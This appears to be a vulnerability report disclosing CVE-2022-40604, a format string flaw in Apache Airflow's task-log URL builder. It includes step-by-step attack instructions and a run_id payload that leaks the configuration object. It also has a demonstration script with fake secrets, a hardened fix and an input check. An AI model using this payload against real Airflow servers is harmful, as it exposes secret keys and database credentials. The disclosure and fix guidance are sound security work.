CVE-2022-40604: Apache Airflow: Format String Vulnerability
Critical
Vulnerability Details
There is a format string vulnerability in src/airflow/utils/log/file_task_handler.py: the URL used to fetch a task log from the worker is built by calling `.format()` on a string that already contains user-controlled data.
> url = os.path.join("http://{ti.hostname}:{worker_log_server_port}/log", log_relative_path).format(
> ti=ti, worker_log_server_port=conf.get('logging', 'WORKER_LOG_SERVER_PORT')
> )
In the above code, part of `log_relative_path` is attacker-controlled: it is rendered from the log filename template, which includes the `run_id` among other fields. Because `.format()` runs over the joined string, any `{...}` field placed in the `run_id` is evaluated as a format field with the `ti` (task instance) object as its starting point, and attribute and index traversal from `ti` reaches module globals such as the configuration object.
Attack steps:
1. Open the DAGs menu, choose any DAG, and select `Trigger DAG w/ config`.
2. Set the run_id to `{ti.task.__class__.__init__.__globals__[conf].__dict__}` and trigger it.
3. Open the `/xcom/list/` page and click through to the corresponding task instance.
4. Click `Log` and capture the request; it will look like the following:
`/get_logs_with_metadata?dag_id=example_xcom&task_id=push_by_returning&map_index=-1&execution_date=2022-08-29T13%3A25%3A11%2B00%3A00&try_number=1&metadata=null`
5. Change `try_number` to a nonexistent attempt, such as 9999. No local log file exists for that attempt, so the handler falls through to fetching the log from the worker, which is the code path that calls `.format()`:
`/get_logs_with_metadata?dag_id=example_xcom&task_id=push_by_returning&map_index=-1&execution_date=2022-08-29T13%3A25%3A11%2B00%3A00&try_number=9999&metadata=null`
6. Load the modified URL in the browser. The response contains the expanded format field, i.e. the `__dict__` of the configuration object, instead of a log.
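The following is an added example, not code from the report or from Apache Airflow. It reproduces the mechanism behind the steps above with constructed stand-ins: a fake `conf` object holding constructed secrets, a fake operator whose `__init__` lives in the same module (so `__init__.__globals__` contains `conf`, the shape the payload relies on), and a minimal task instance. `build_url_vulnerable` follows the reported pattern; `build_url_hardened` expands only the trusted template and appends the user-derived path afterwards; `looks_like_format_injection` is a cheap input check. The log path layout, port and hostname are assumptions for illustration.

```python
import os
import re
from types import SimpleNamespace


class FakeConf:
    """Stand-in for airflow.configuration.conf: an object whose __dict__ holds secrets.
    Values are constructed samples."""

    def __init__(self):
        self.secret_key = "constructed-webserver-secret"
        self.sql_alchemy_conn = "postgresql://airflow:hunter2@db/airflow"


# Module-level `conf`, just as an operator module imports `conf` into its globals.
conf = FakeConf()


class FakeOperator:
    # __init__ is defined here, so FakeOperator.__init__.__globals__ is this module's
    # globals dict, which contains `conf`. That is what the payload traverses.
    def __init__(self):
        pass


def make_task_instance(run_id, hostname="worker-1"):
    """Minimal task instance exposing only the attributes the URL builder touches."""
    return SimpleNamespace(
        dag_id="example_xcom",
        task_id="push_by_returning",
        run_id=run_id,
        hostname=hostname,
        task=FakeOperator(),
    )


def log_relative_path(ti, try_number):
    # Assumed layout of a run_id-based log filename template; the point is only
    # that the attacker-chosen run_id ends up inside the path.
    return f"dag_id={ti.dag_id}/run_id={ti.run_id}/task_id={ti.task_id}/attempt={try_number}.log"


def build_url_vulnerable(ti, try_number, port="8793"):
    """Reported pattern: .format() runs over a string that already contains user input,
    so format fields smuggled in via run_id are evaluated against `ti`."""
    return os.path.join(
        "http://{ti.hostname}:{worker_log_server_port}/log",
        log_relative_path(ti, try_number),
    ).format(ti=ti, worker_log_server_port=port)


def build_url_hardened(ti, try_number, port="8793"):
    """Expand only the trusted template, then join the user-derived path untouched,
    so braces in run_id stay literal characters."""
    base = "http://{ti.hostname}:{worker_log_server_port}/log".format(
        ti=ti, worker_log_server_port=port
    )
    return os.path.join(base, log_relative_path(ti, try_number))


FORMAT_FIELD = re.compile(r"\{[^{}]*\}")


def looks_like_format_injection(value):
    """Flag identifiers that carry a str.format replacement field; useful as a
    defence-in-depth check where untrusted names may later reach .format()."""
    return bool(FORMAT_FIELD.search(value))


if __name__ == "__main__":
    payload = "{ti.task.__class__.__init__.__globals__[conf].__dict__}"
    ti = make_task_instance(payload)
    print("vulnerable:", build_url_vulnerable(ti, 9999))
    print("hardened:  ", build_url_hardened(ti, 9999))
    print("flagged:   ", looks_like_format_injection(payload))
```

Running it shows the vulnerable URL carrying the whole `__dict__` of `conf`, secrets included, while the hardened URL contains the payload only as literal text. The fix that matters is ordering: format the template you own, then concatenate untrusted data; never call `.format()` on a string after untrusted input has been spliced into it. The regex check is an extra guard for the place where `run_id` is accepted, not a substitute for that ordering.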
## Impact
An attacker can read sensitive configuration through this vulnerability, such as the webserver `secret_key`, the database connection string and other settings.
With the `secret_key` an attacker can forge identities (signed sessions); the connection string yields the database password. The vulnerability can be triggered through any DAG by a user who is allowed to trigger DAGs, and it is present in a production configuration, so I rate it critical.
Report Stats
- Report ID: 1707287
- State: Closed
- Substate: resolved
- Upvotes: 11